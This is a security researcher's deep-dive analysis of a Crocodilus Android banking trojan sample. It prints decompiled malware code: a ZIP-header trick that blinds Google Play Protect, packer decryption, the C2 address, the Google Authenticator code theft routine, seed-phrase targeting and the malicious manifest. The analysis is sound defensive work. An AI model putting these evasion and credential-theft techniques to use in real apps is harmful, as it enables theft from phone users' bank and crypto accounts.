Crocodilus - A deep dive into its structure and capabilities
Jul 16, 2025
Author: Paul Viard
In this article, we will deep dive into internals works and key components of a new evolution of the Crocodilus Android Banking Trojan, discovered by ThreatFabric in March. The malware is equipped with various functionalities designed to exfiltrate user credentials, cryptocurrency wallet data, and system information from the victim. We have focused our research on the Trojan's inner workings, its communication with C2 and some RAT commands that we thought would be interesting to explore in greater depth.
Crocodilus was discovered by ThreatFabric on march 28, 2025. At this time, a list of Bot and RAT commands are mentioned by the ThreatFabric team. Then, on april 14, 2025, a new Zimperium article mentions the presence of the codename "Pragma Project" and the use of native libraries in a new variant.Finally, june 03, 2025, Threat Fabric releases a new article on a crocodilus variant with new capabilities, such as adding a new phone number to contacts. Our analysis will focus on one of the latest variants to appear with the sha256 hash: 6d55d90d021b0980528f56d040e78fa7b85a96f5c244e23f330f24c8e80c1cb2
Anti-Reversing technique
Malware developers tend to follow a consistent routine in the development of their products. They first build a core malicious component, which is later deployed onto the victim's device via another app or through dynamic code loading. Before this stage, the developer aims to conceal the APK's behavior for as long as possible using initial anti-reversing techniques. In that case, Crocodilus is no exception, using a modified entry inside the APK to bypass basic tools and certain analysis mechanisms.
Password protected file
Common tools like jadx or apktool couldn’t decompress the .apk because of an "encrypted entry".
Using unzip allowed us to find the *incorrect* file located at the root of the achive:
shellunzip croco.apk
# ...
extracting:assets/stjgtuurbezeuim.png
inflating:assets/8.mp3[croco.apk]qyryrzr.png password: # A password is required
Using 7zip showed us a different output to rule out the possibility of a password:
shell7z x croco.apk
# ...
ERROR:Headers Error :qyryrzr.png
Again, with unzip, qyryrzr.png is the only file with ZIP Version 3 and a different OS of origin:
Before we dive deeper into the log snippet above, some background information needs to be clarified. Finsky is the internal codename for the Google Play Store application on Android devices. It handles application installations, updates, and integrity checks through Google Play Protect (also known as Verify Apps). VerifyAppsInstallTask is a component that is triggered during app installation. Its role is to scan APK files for potential malware either before or during the installation process. In the log snippet above, an "invalid CEN header (Encrypted entry)" error is raised while inspecting the temporary file /data/app/vmdl1013385448.tmp. During the installation process, the APK is first copied to a temporary location in the /data/app/ directory. Then, Finsky’s VerifyAppsInstallTask parses the APK’s ZIP structure, extracts specific files, and computes cryptographic hashes. However, due to changes made to the ZIP structure, in particular to the qyryrzr.png file, Finsky is unable to inspect the Crocodilus APK correctly. As a result, Verify Apps mistakenly flags the package nuttiness.pamperer.cosmetics as SAFE. As this file is not accessible for analysis, we conclude that it serves no other purpose than to slow down analysts and prevent Google Play Portect from working properly.
Understanding the Manifest
Tools like jadx or apktool converts automatically the AndroidManifest file into a readable format, .xml, but not unzip. The AndroidManifest.xml file is by default an Android Binary XML which can be parsed with tools like Androguard or axmldec.
shell
./axmldec -o ../output_rd_AndroidManifest.xml ../AndroidManifest.xml # convert Android Binary XML into human readable XMLcat ../output_rd_AndroiManifest.xml | grep MAIN -n5 #We search foran entry point
The AndroidManifest.xml reveals that the application’s actual Application class is aixx.uvoe.pxoq.Iqom. The malware defines two activities with the MAIN action: - nuttiness.pamperer.cosmetics.NAoCWwqxpyor - nuttiness.pamperer.cosmetics.uFAWABASFEFwvh Interestingly, the second activity (uFAWABASFEFwvh) uses the LEANBACK_LAUNCHER category, typically intended for Android TV applications. This unusual choice helps the malware avoid being visible in the standard application launcher on mobile devices, making it stealthier during regular use. The application explicitly allows unencrypted network traffic by setting android:usesCleartextTraffic="true". This permits HTTP communications, which is highly suspicious in nowadays. In addition, Crocodilus uses this traffic to communicate with its C2 and exfiltrate victims' data. Additionally, the malware masquerades as the Chrome browser by assigning the label "Chrome" (android:label="Chrome") and likely reusing the legitimate Chrome app’s icon to deceive users or security analysts. A particularly deceptive technique is the presence of an activity-alias named nuttiness.pamperer.cosmetics.TrumpTayyip. This alias also uses the label "Chrome" and points to the activity nuttiness.pamperer.cosmetics.NAoCWwqxpyor. However, it is disabled by default (android:enabled="false"), meaning the fake Chrome icon remains hidden during initial installation or static analysis. The malware can later dynamically enable this alias at runtime using Android’s PackageManager APIs, causing the fake Chrome icon to suddenly appear, potentially tricking users into launching the malicious application.
Stage 1 - Packer Behavior and Dynamic Loading
The initial stage of the malware functions as a packer, a module responsible for unpacking, decrypting, and loading the core malicious payload.
The packer loads a fake .json file that, upon inspection, is not structured as a valid JSON file. Instead, it contains binary data, specifically, an encrypted DEX file (the second-stage payload).
We opened the classes.dex file inside jadx-gui to see the java code and have a better understanding of this malware. Through the different classes and packages listed inside jadx-gui, some are missing - such as nuttiness.pamperer.cosmetics - which could indicate the use of dynamic code loading or resolution.
Dynamic Code Loading
The malware performs a call to open() following the use of the getAssets() method, which is typically used to access files bundled in the APK’s assets folder. In this case, the function attempts to load a file at runtime by passing a filename as a parameter. This behavior is implemented in function baggyvagrantly(). This function reads the file specified in the second argument, and returns a byte array. This pattern strongly suggests that the malware is loading an encrypted payload from the assets folder. By doing so, the developer avoids placing malicious code directly in the first stage of the malware, potentially evading static analysis and signature-based detection. Here's the relevant code:
This second argument String filename, is obtained with a special function, monopolysinger, called in exquisitereborn (the parent function of baggyvagrantly). We will describe this in the Multiple Obfuscations part below. Then, the ByteArray is sent to function oozyoutsource inside the class Outlastunafraid
To understand how the filename is retrieved with monopolysinger and how the ByteArray is sent to be load at runtime, we will need to bypass some obfuscation techniques.
Multiple Obfuscations
We are now certain of the presence of dynamically loaded code, and in this part, we will see how the file is read and how its content is transferred through multiple functions to increase the analysis difficulty.
Strings
The String filename parameter used previously by the function baggyvagrantly, is set by the monopolysinger() function, where a simple XOR operation is applied to the decimal array [124, 115, 115, 59, 127, 102, 122, 123] using the decimal key 21. After decryption, the resulting filename is "iff.json", which points to a raw binary file disguised with a .json extension.
The key is declared as a private static final byte <random_word>. Using regex inside jadx-gui told us that 21 is the same key for every encrypted strings.
We used another regex rule to detect every decimal array in the code. It matches sequences like {12, 45, 78} or arrays containing Byte.MAX_VALUE. This pattern is implemented inside a Python script to de-obfuscate the strings. The regex used is:
Here is a list of decrypted strings found inside the malware:
[iff.json, mClassLoader, AES/CBC/PKCS5Padding, mLoadedApk, gullyclosure.dex] The python script can be found in the Annexes.
Control Flow Obfuscation
To understand how the content of iff.json (ByteArray) is used, we followed the execution flow after exquisitereborn starting from oozyoutsource, through several wrapper functions before reaching the main_logic function. These _wrappers_ transfers control or data to the principal code segment and serves as an obfuscation layer — a known technique used to confuse analysts and hinder static analysis.
In order to confuse the analyst, the ByteArray value, byte[] bArr, is transferred through several functions and classes, and finally in main_logic where it will be decrypted . Function main_logic uses AES decryption routine to write a new DEX file on the device, this routine will be explains in the following section.
AES Decryption
After bypassing the control flow obfuscation, the final function main_logic is accessed. main_logic, renamed from its obfuscated name favorablechevron, performs AES decryption on the contents of iff.json and writes the result to a new file named gullyclosure.dex.
Inside setup_AES_decrypt(), a key is extracted from iff_json_bytes by taking bytes 32 to 48, an IV from bytes 48 to 64, and the ciphertext from byte 72 to the end of the array. Then the ciphertext is decrypted using "AES/CBC/PKCS5Padding".
"after receiving the raw data, the data must first be clustered. If the length of the cluster does not meet the cluster conditions, it is necessary to supplement and finally form a series of clusters when using the encryption and decryption algorithm, encryption, and decryption of the multiple groups."
After using CyberChef, we are able to confirm our assumptions on the true nature of iff.json because of the first bytes read, the dex signature:
A python script can be found in the Annexes to automatically extract the second-stage dex file.
Dynamic Class Loading & Self Deletion
Now that we have reviewed the different steps to obtain a new clean DEX file, this section will focus on the runtime loading of stage 2. Using the list of strings de-obfuscated, two unused strings: "mLoadedApk" & "mClassLoader" are searched in jadx-gui. The code in wrp_class_loader() is a reflective Java code designed to replace the defaultClassLoader of an Android app at runtime with a different one (see next paragraph).
The parent function riptideyapping injects a new PathClassLoader to dynamically loads the DEX file "gullyclosure.dex". After the DEX file is loaded, the function deletes it from the disk, leaving only the decrypted version of iff.json in memory.
After we discovered how iff.json is used to create a new DEX file and how it is loaded into memory, we wanted to understand the application's life cycle and find its entry points.
Entry points
By backtracking through the execution flow, we pinpointed the entry points that initiated the execution of the previous two functions - exquisitereborn & riptideyapping.In the class Tricepsdial inside package loqlhajt.budgetsepia.possiblyanime, two important functions are present, attachBaseContext and onCreate. On one hand, attachBaseContext reads the iff.json file from the assets folder and decrypts its content into a DEX file. On the other hand, onCreate dynamically loads this DEX file and then deletes it from the disk.
java
@Override// android.content.ContextWrapper protected voidattachBaseContext(Context context){super.attachBaseContext(context);try{wrp_to_exquisitereborn(context);// loads iff.json and write it to gullyclosure.dex}catch(Exception e){}}
@Override// android.app.Application public voidonCreate(){super.onCreate();try{wrp_to_riptideyapping(this);// Load gullyclosure.dex / stage 2 }catch(Exception e){thrownewRuntimeException("Error in onCreate",e);}}
Based on the documentation of Application.onCreate(), the Application object’s onCreate() method is called before any activity, service, or receiver objects (except content providers) are created. However, according to this medium post, attachBaseContext is executed before onCreate happens. To summarize, attachBaseContext is executed firstly and calls exquisitereborn to write a new DEX file. Then, onCreate calls riptideyapping to load dynamically gullyclosure.dex.
However, in the AndroidManifest.xml, the application’s name is "aixx.uvoe.pxoq.Iqom". Inside this class, only one noteworthy method is present: attachBaseContext. This function redirects the execution flow to the class VzxfOopr:
java/* Class aixx.uvoe.pxoq.Iqom */protected voidattachBaseContext(Context context){super.attachBaseContext(context);try{VzxfOopr.launchEntryPoint(context);/* ... */}}
Within VzxfOopr, the launchEntryPoint method decodes an obfuscated string that points to the real entry point already identified: loqlhajt.budgetsepia.possiblyanime.
Finally, the last line invoked the attachBaseContext method of the possiblyanime class. This execution chain is clearly designed to conceal the packer’s true entry point for as long as possible. However, as shown in this case, it could still be uncovered by carefully backtracking through the execution flow.
Stage 2
The second stage of the malware acts as a RAT (Remote Access Trojan). Its primary goals is to enable the Accessibility service, communicates with the C2 server, and extracts confidential data from the device. Using a python script (available at "stage two extraction" in Annexes), we decrypted the iff.json file into a new DEX file -> gullyclosure.dex. This time, nuttiness.pamperer.cosmetics and the LAUNCHER of the malware are inside the class uFAWABASFEFwvh.
javapublic voidonCreate(Bundle bundle){super.onCreate(bundle);/* ... */this.WyeYYVjhhMdbqG.toLog(">>>START<<<","<< START CROCODILE BOT 2025 >> **** YOU LUCAS STEFANKO ");finish();
Obfuscation
This malware uses the class nuttiness.pamperer.cosmetics.xaWvaIufkin.sIbsaRKoVR to store all the strings it needs inside arbitrarily named variables. Within this class, four types of content can be found: plaintext values, Base64-encoded values, RAT command strings and empty variables. Here's the relevant code:
javapublic voidonCreate(Bundle bundle){super.onCreate(bundle);/* ... */this.WyeYYVjhhMdbqG.toLog(">>>START<<<","<< START CROCODILE BOT 2025 >> **** YOU LUCAS STEFANKO ");finish();```
### Obfuscation
This malware uses the class `nuttiness.pamperer.cosmetics.xaWvaIufkin.sIbsaRKoVR` to store all the strings it needs inside arbitrarily named variables.
Within this class, four types of content can be found: plaintext values, Base64-encoded values, RAT command strings and empty variables.
Here's the relevant code:
```javapublic static String QureAhrrkvrWdYVcIt = "Chrome 2.0.4 Update";/* renamed from: hiiTkSjilhrg */public static String c2_url = "http://rentvillcr.homes";private static final Map<String,String> xDtdOHuUatEIiIh;public String GRMeEoEOOJSiCc;/* renamed from: PEZeMAQPvizETyOfq */public String[]android_version;public String QbaaRTdTCPYDknVe;public final String TTYvIcxiTOwabQ;public String UOtETXdmbozp;public String dfWLXNNCwtKiQb;public String flkJjpkKyxMv;/* ... */public String iKWgdxbvoimhekUY = "O6155FI2SXZ";public String ZpswOiujEheim = "TCL9CLSKDLX12";public String OGETrbPXJNthc = base64decode("LCJleGl0IjoiIg==");public String lbXSkjppXRZdyV = base64decode("LCJleGl0IjoidHJ1ZSI=");public String pGUkvXZvaYguSmuye = "852147414735";public String jjYHMEVwGSNSlwc = "864512532655";public String NknlBDFjiriGaDfQ = "154856895422";
SharedPreferences
SharedPreferences are used to store several values for the malware and to keep them across device reboots. For instance, Crocodilus stores the C2 url, 2FA codes stolen, cryptocurrency keys etc. According to the Android documentation:
"SharedPreferences object points to a file containing key-value pairs and provides simple methods to read and write them."
The following function is used to set a specific key-value pairs inside FilesSettings:
A non-exhaustive list of the settings used can be found in the annexes. The SharedPreferences are important for the malware as we will see in the Cryptocurrency Wallets and the Interesting RAT commands parts.
Accessibility Service
To be fully operational, crocodilus requires accessibility service. This is one of the most important permissions in the user environment. According to the Android documentation:
"An _accessibility service_ is an app that enhances the user interface to assist users with disabilities or who might temporarily be unable to fully interact with a device."
The accessibility permission for the malware is asked to the user through an Android WebView. The HTML content of the WebView is then decoded from a base64 variable :
We decoded the HTML content and the JavaScript which aims to enable Accessibility permission on the app.
javascript// A Function to open accessibility settings for Android WebViewfunctionopenSettings(){try{if(typeofAndroid !== 'undefined' && Android.openAccessibilitySettings){android.openAccessibilitySettings();}else{alert('This feature is only available in the Android app.');}}catch(e){console.error('Error opening accessibility settings',e);}}
This WebView tries to fool the user by showing a fake chrome page.
Once the victim has accepted the accessibility service, the malware can performs any user action on the device, such as opening settings, retrieving text from the screen, etc. The class nuttiness.pamperer.cosmetics.iRhkqgbpsuK.dNCGxurzQUjoF extended the Accessibility Service and is responsible for the execution of RAT commands. By overriding the onAccessibilityEvent function from android.accessibilityservice.AccessibilityService, the malware performed different actions based on the eventType value. These eventType correspond to actions generated by the user or by the malware itself.
Being a RAT, the malware relies essentially on active communication with its server. Being able to understand and extract the information sent between the device and C2 can help us better understand Crocodilus behavior. The DEX file being enormously obfuscated, we focused on is communication with the C2. The C2 URL can be found in the nuttiness.pamperer.cosmetics.xaWvaIufkin.sIbsaRKoVR class mentioned above in the Obfuscation section.
Others occurrences of c2_url led us to the encryption routine of the communication. All inputs and outputs are encrypted using strings manipulation and AES algorithm. Then the content is sent to http[:]//rentvillcr[.]homes/Pragmatical.
The AES encryption is followed by several strings manipulation and base64 encoding. Listing all the modifications of the content helped us to build a script to decrypt Crocodilus requests. The encryption method used is AES/CBC/PKCS5Padding. The IV is a 16 byte array randomly generated.
The main mission of Crocodilus is to steal cryptocurrency-related data from the device. The malware specifically targets two critical components within cryptocurrency wallets: private keys and seed phrases. It extracts them using distinct regular expressions tailored for each case. Afterwards, the malware stores these sensitive components in the app’s Shared Preferences, using two distinct keys. The names of the targeted applications are received dynamically through the C2 server. However, At least three specific applications are consistently targeted:
When a TYPE_WINDOW_STATE_CHANGED event is triggered, this code compares the various crypto targets with the currently active one specified by the C2 server:
"Four samples includes a custom-written native library that loads a file from the assets folder. This file is hidden with a _.png_extension but is in fact encrypted data."
However, although a significant number of files are present in the assets folder, no trace in the code allows us to confirm this assertion for this particular sample?
Interesting RAT commands
In their blogpost, ThreatFabric published the list of the RAT commands but didn't wrote a technical review of them. We choose to focus on three promising commands.
Complex Gesture - trXSB123QEBASDF
According to ThreatFabric, this commands, allows malware to perform a complex finger gesture on the device. The behavior depends on the C2 order and more precisely, the number of coordinates.
java//retrieve actual coordinates saved inside the jsonObjectJSONArray jSONArray = jSONObject.getJSONArray(this.new_list_commands.str_coordinates);int duration = jSONObject.getInt(this.new_list_commands.str_duration);ArrayList arrayList = newArrayList();for(int indexObj = 0;indexObj < jSONArray.length();indexObj++){// create a Point for each coordinates(x,y) inside the C2 orderJSONObject coordinatesObj = jSONArray.getJSONObject(indexObj);arrayList.add(newPointF((float) coordinatesObj.getDouble(this.new_list_commands.str_x),(float) coordinatesObj.getDouble(this.new_list_commands.str_y)));}complexGesture(arrayList,(long) duration);return;
If the number of PointF objects in listCoordinatesXY is greater than or equal to 2 (with distinct coordinates), the dispatcher simulates finger movements on the device based on the generated points. Otherwise, a circle is added to simulate a simple tap by the user.
This technique relies on the AccessibilityService API. The method dispatchGesture() is a legitimate API introduced in Android 7.0 (API level 24) that allows apps with accessibility privileges to simulate complex user gestures on the device, without requiring user interaction. In this case, the malware received a set of coordinates from the C2 server, built a gesture path using these points, and executed the gesture on the device.
Steal Google Authenticator codes - TG32XAZADG
According to ThreatFabric, the malware steals 2FA code inside G-Auth and hid them inside SharedPreferences. If the RAT commands ID TG32XAZADG is received by the malware, an instance of the app "com.google.android.apps.authenticator2" is launched via an intent. Next, several fields are set with boolean value which will have an impact later on program.
java/* RAT CODE */private voidstealGoogleAuthApp(){Intent launchIntentForPackage = getPackageManager().getLaunchIntentForPackage(this.new_list_commands.str_package_GoogleAuthenticator);if(launchIntentForPackage != null && this.mainClass.isLockScreenShowing(this)){startActivity(launchIntentForPackage);// start Google AuthenticatornewHandler(Looper.getMainLooper()).postDelayed(newRunnable(){// from class: nuttiness.pamperer.cosmetics.iRhkqgbpsuK.dNCGxurzQUjoF.8
@Override// java.lang.Runnablepublic voidrun(){RAT_commands.this.value_setTrueWhenGAuth = true;RAT_commands.this.valueSetFalse = false;}},1800);}}
A verification step is performed to check whether the device is on the lock screen:
- Returns true if the device is not on the lock screen.
- Returns false if the device is on the lock screen.
The steal_2FACode function uses the accessibilityNodeInfo object to inspect the current text displayed in the window and retrieves 2FA codes by matching the regular expression \\d{6,8}, which captures all numeric sequences between 6 and 8 digits long. The matched codes are then appended to an array list. If no text is found in the current node, the function accessed the child components and recursively re-executed itself.
Each code is then placed inside a JSONObject, converted into a string, and written to the Shared Preferences"FilesSettings" under the key "L74F7L400TR".
According to ThreatFabric, this RAT command extracts a lot of information on the current window. In addition, a black rectangle is placed in front of the view, hiding the behavior of the RAT. In the dispatcher code, `hidden_bool` is set to true and a Global ActionHome is performed.
The hidden_bool value is used within the onAccessibilityEvent function. However, for this function to be triggered, an AccessibilityEvent (such as TYPE_WINDOW_STATE_CHANGED or TYPE_VIEW_CLICKED) must first occur. This is achieved through the previous GLOBAL_ACTION_HOME` call: performGlobalAction(2);
core_hidden_mode starts a new thread and uses hideExtract function to retrieve several information about the current view (isChecked, isClickable, getPackageName, ...) and creates a new rectangle based on the size of the screen.
In hideExtract(), the rectangle is created using the package android.graphics.Rect. Then, a lot of information are put in a jsonObject which will be sent to the C2.
In June, a new version of Crocodilus is discovered by ThreatFabric with a new feature update. The malware has now the ability "to modify the contact list" and "adds a specified contact to the victim's contact list".
The goal is to lure the victim into communicating with a "legitimate" contact and to use social engineering techniques to extract sensitive information. In this behavior, the C2 sent a response with the command id TRU9MMRHBCRO and two strings : name & phone number.
xml
<?xml version="1.0"encoding="utf-8"?>
<manifestxmlns:android="http://schemas.android.com/apk/res/android"android:versionCode="1"android:versionName="1.0"android:compileSdkVersion="35"android:compileSdkVersionCodename="15"package="nuttiness.pamperer.cosmetics"platformBuildVersionCode="35"platformBuildVersionName="15"><uses-sdkandroid:minSdkVersion="26"android:targetSdkVersion="35"/><uses-featureandroid:name="android.hardware.telephony"android:required="false"/><uses-featureandroid:name="android.hardware.camera"android:required="false"/><uses-featureandroid:name="android.software.leanback"android:required="false"/><uses-featureandroid:name="android.hardware.touchscreen"android:required="false"/><uses-permissionandroid:name="android.permission.QUERY_ALL_PACKAGES"/><uses-permissionandroid:name="android.permission.READ_SMS"/><uses-permissionandroid:name="android.permission.POST_NOTIFICATIONS"/><uses-permissionandroid:name="android.permission.READ_PHONE_STATE"/><uses-permissionandroid:name="android.permission.RECEIVE_WAP_PUSH"/><uses-permissionandroid:name="android.permission.READ_CELL_BROADCASTS"/><uses-permissionandroid:name="android.permission.CAMERA"/><uses-permissionandroid:name="android.permission.RECEIVE_SMS"/><uses-permissionandroid:name="android.permission.SEND_SMS"/><uses-permissionandroid:name="android.permission.WRITE_SMS"/><uses-permissionandroid:name="android.permission.FOREGROUND_SERVICE_DATA_SYNC"/><uses-permissionandroid:name="android.permission.CALL_PHONE"/><uses-permissionandroid:name="android.permission.WAKE_LOCK"/><uses-permissionandroid:name="android.permission.REQUEST_DELETE_PACKAGES"/><uses-permissionandroid:name="android.permission.INTERNET"/><uses-permissionandroid:name="android.permission.ACCESS_NETWORK_STATE"/><uses-permissionandroid:name="android.permission.RECEIVE_BOOT_COMPLETED"/><uses-permissionandroid:name="android.permission.SCHEDULE_EXACT_ALARM"/><uses-permissionandroid:name="android.permission.BROADCAST_SMS"/><uses-permissionandroid:name="android.permission.FOREGROUND_SERVICE"/><uses-permissionandroid:name="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION"/><uses-permissionandroid:name="android.permission.USE_EXACT_ALARM"/><uses-permissionandroid:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/><uses-permissionandroid:name="android.permission.READ_CONTACTS"/><uses-permissionandroid:name="android.permission.WRITE_CONTACTS"/><uses-permissionandroid:name="android.permission.FOREGROUND_SERVICE_CAMERA"/><applicationandroid:theme="type1/16973840"android:label="IKO"android:icon="type1/2131361792"android:name="aixx.uvoe.pxoq.Iqom"android:allowBackup="true"android:supportsRtl="true"android:extractNativeLibs="false"android:usesCleartextTraffic="true"android:roundIcon="type1/2131361793"><meta-dataandroid:name="com.december.META_6391"android:value="true"/><activityandroid:theme="type1/16973909"android:name="nuttiness.pamperer.cosmetics.uFAWABASFEFwvh"android:exported="true"><intent-filter><actionandroid:name="android.intent.action.MAIN"/><categoryandroid:name="android.intent.category.LEANBACK_LAUNCHER"/></intent-filter><intent-filter><actionandroid:name="android.intent.action.SEND"/><actionandroid:name="android.intent.action.SENDTO"/><categoryandroid:name="android.intent.category.DEFAULT"/><categoryandroid:name="android.intent.category.DEFAULT"/><categoryandroid:name="android.intent.category.BROWSABLE"/><dataandroid:scheme="sms"/><dataandroid:scheme="smsto"/><dataandroid:scheme="mms"/><dataandroid:scheme="mmsto"/></intent-filter><intent-filter><actionandroid:name="android.provider.Telephony.SMS_DELIVER"/><categoryandroid:name="android.intent.category.DEFAULT"/></intent-filter><intent-filter><actionandroid:name="android.provider.Telephony.SMS_RECEIVED"/><categoryandroid:name="android.intent.category.DEFAULT"/></intent-filter></activity><activityandroid:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.rdmKJuIymoGRaV"/><serviceandroid:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.rtdzNIjokJIwY"android:exported="false"android:foregroundServiceType="0x40"/><activityandroid:theme="type1/16973909"android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.LySOcIBihIQ"/><activityandroid:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.meBMKbzEKRHH"/><activityandroid:icon="type1/2131361792"android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.MRlmQjhjzwF"/><activityandroid:icon="type1/2131361792"android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.qcdtubatsJj"/><activityandroid:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.FuZhBIEyzw"/><serviceandroid:name="nuttiness.pamperer.cosmetics.dXvjqtFLitYbw"android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE"android:exported="true"><intent-filter><actionandroid:name="android.intent.action.VIEW"/><categoryandroid:name="android.intent.category.DEFAULT"/><categoryandroid:name="android.intent.category.BROWSABLE"/><actionandroid:name="android.intent.action.RESPOND_VIA_MESSAGE"/><dataandroid:scheme="sms"/><dataandroid:scheme="smsto"/><dataandroid:scheme="mms"/><dataandroid:scheme="mmsto"/></intent-filter><intent-filter><actionandroid:name="android.provider.Telephony.SMS_DELIVER"/><categoryandroid:name="android.intent.category.DEFAULT"/></intent-filter><intent-filter><actionandroid:name="android.provider.Telephony.SMS_RECEIVED"/><categoryandroid:name="android.intent.category.DEFAULT"/></intent-filter></service><receiverandroid:name="nuttiness.pamperer.cosmetics.qrNsfPHktbXX.JvwhVMVjSgK"android:permission="android.permission.BROADCAST_SMS"android:enabled="true"android:exported="true"><intent-filter><actionandroid:name="android.intent.action.SCREEN_OFF"/><actionandroid:name="android.intent.action.SCREEN_ON"/><actionandroid:name="android.intent.action.USER_PRESENT"/><actionandroid:name="android.intent.action.PACKAGE_ADDED"/><actionandroid:name="android.intent.action.PACKAGE_REMOVED"/><actionandroid:name="android.intent.action.ACTION_PACKAGE_RESTARTED"/><actionandroid:name="android.intent.action.ACTION_POWER_CONNECTED"/><actionandroid:name="android.intent.action.ACTION_POWER_DISCONNECTED"/><actionandroid:name="android.intent.action.CONNECTIVITY_CHANGE"/><actionandroid:name="android.intent.action.ROLE_HOLDER_CHANGED"/><actionandroid:name="android.intent.action.BOOT_COMPLETED"/><actionandroid:name="android.intent.action.MY_PACKAGE_REPLACED"/><actionandroid:name="android.provider.Telephony.SMS_RECEIVED"/><actionandroid:name="android.provider.Telephony.SMS_DELIVER"/><actionandroid:name="com.htc.intent.action.QUICKBOOT_POWERON"/><categoryandroid:name="android.intent.category.DEFAULT"/></intent-filter></receiver><activityandroid:name="com.casket.liftingActivity"android:exported="false"/><activityandroid:name="com.unknowing.thermosActivity"android:exported="false"/><receiverandroid:label="IKO"android:name="nuttiness.pamperer.cosmetics.NJWLtIfaF.nTsZKYXKEBeFL"android:permission="android.permission.BIND_DEVICE_ADMIN"android:exported="true"><meta-dataandroid:name="android.app.device_admin"android:resource="type1/2131623937"/><intent-filter><actionandroid:name="android.app.action.DEVICE_ADMIN_DISABLED"/><actionandroid:name="android.app.action.DEVICE_ADMIN_ENABLED"/><actionandroid:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED"/><actionandroid:name="android.app.action.ACTION_PASSWORD_FAILED"/><actionandroid:name="android.app.action.ACTION_PASSWORD_SUCCEEDED"/></intent-filter></receiver><serviceandroid:label="IKO"android:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.dNCGxurzQUjoF"android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"android:exported="true"><intent-filter><actionandroid:name="android.accessibilityservice.AccessibilityService"/></intent-filter><meta-dataandroid:name="android.accessibilityservice"android:resource="type1/2131623936"/></service><activityandroid:theme="type1/16973840"android:label="IKO"android:name="nuttiness.pamperer.cosmetics.NJWLtIfaF.qZNjmvvzOlM"/><serviceandroid:name="nuttiness.pamperer.cosmetics.qrNsfPHktbXX.ARpBKilrFVPX"android:exported="false"/><serviceandroid:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.XsjZacRzUT"android:exported="false"/><serviceandroid:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.kiTSsznoH"android:enabled="true"android:exported="false"android:foregroundServiceType="0x1"/><activityandroid:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.oNVySSUEROdsit"android:exported="true"android:launchMode="3"/><activityandroid:label=""android:name="nuttiness.pamperer.cosmetics.TJydMkiWRbuz.VjdYBSczMgQj"android:excludeFromRecents="true"android:launchMode="2"/><receiverandroid:name="nuttiness.pamperer.cosmetics.XFCcaJxgsv.GqDpxLfoTDmtcd"android:permission="android.permission.BROADCAST_WAP_PUSH"android:exported="true"><intent-filter><actionandroid:name="android.provider.Telephony.WAP_PUSH_DELIVER"/><dataandroid:mimeType="application/vnd.wap.mms-message"/></intent-filter></receiver><activityandroid:label="Chrome"android:name="nuttiness.pamperer.cosmetics.NAoCWwqxpyor"android:exported="true"/><activity-aliasandroid:label="Chrome"android:icon="type1/2131099736"android:name="nuttiness.pamperer.cosmetics.TrumpTayyip"android:enabled="false"android:exported="true"android:targetActivity="nuttiness.pamperer.cosmetics.NAoCWwqxpyor"><intent-filter><actionandroid:name="android.intent.action.MAIN"/><categoryandroid:name="android.intent.category.LAUNCHER"/></intent-filter><intent-filter><actionandroid:name="android.intent.action.SEND"/><actionandroid:name="android.intent.action.SENDTO"/><categoryandroid:name="android.intent.category.DEFAULT"/><categoryandroid:name="android.intent.category.BROWSABLE"/><dataandroid:scheme="sms"/><dataandroid:scheme="smsto"/><dataandroid:scheme="mms"/><dataandroid:scheme="mmsto"/></intent-filter><intent-filter><actionandroid:name="android.provider.Telephony.SMS_DELIVER"/><categoryandroid:name="android.intent.category.DEFAULT"/></intent-filter><intent-filter><actionandroid:name="android.provider.Telephony.SMS_RECEIVED"/><categoryandroid:name="android.intent.category.DEFAULT"/></intent-filter></activity-alias><serviceandroid:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.AkMYyDUgEerrDn"android:exported="false"android:foregroundServiceType="0x20"/><serviceandroid:name="com.scariness.wrongedService"android:exported="false"/><receiverandroid:name="com.skewer.stormReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver><meta-dataandroid:name="com.numerator.META_5259"android:value="true"/><receiverandroid:name="com.chevy.ruleReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.BATTERY_LOW"/></intent-filter></receiver><meta-dataandroid:name="com.quartered.META_1343"android:value="true"/><receiverandroid:name="com.siberian.passportReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.MEDIA_MOUNTED"/></intent-filter></receiver><activityandroid:name="com.apple.treeActivity"android:exported="false"/><receiverandroid:name="com.chili.impulseReceiver"android:exported="false"><intent-filter><actionandroid:name="android.intent.action.MEDIA_MOUNTED"/></intent-filter></receiver><serviceandroid:name="com.humorist.safenessService"android:exported="false"/><serviceandroid:name="com.flap.decayService"android:exported="false"/><activityandroid:name="com.relight.joltActivity"android:exported="false"/><meta-dataandroid:name="com.uncoated.META_1114"android:value="true"/></application></manifest>
Strings decryption script
pythonimportpyjadximportrejadx = pyjadx.Jadx()app = jadx.load("classes.dex") # Stage one of crocodilusforclsinapp.classes:code = cls.codeifnot code:continuelines = code.splitlines()print("\r")fori,lineinenumerate(lines):ifre.search(r"\{\s*(?:\d+|Byte\.MAX_VALUE)(?:\s*,\s*(?:\d+|Byte\.MAX_VALUE))*\s*\}",line):matches = re.findall(r'\b(Byte\.MAX_VALUE|\d+)\b',line)ifnot matches:continuetry:decoded = ''.join(chr((127if val == "Byte.MAX_VALUE"else int(val)) ^ 21)forvalinmatches)print(f"In class -> {cls.name}")print("From: ",line.strip())print("Decrypted strings: ",decoded)print("-" * 40)except Exceptionas e:print(f"Error in decryption routine inside -> {cls.name}: {e}")
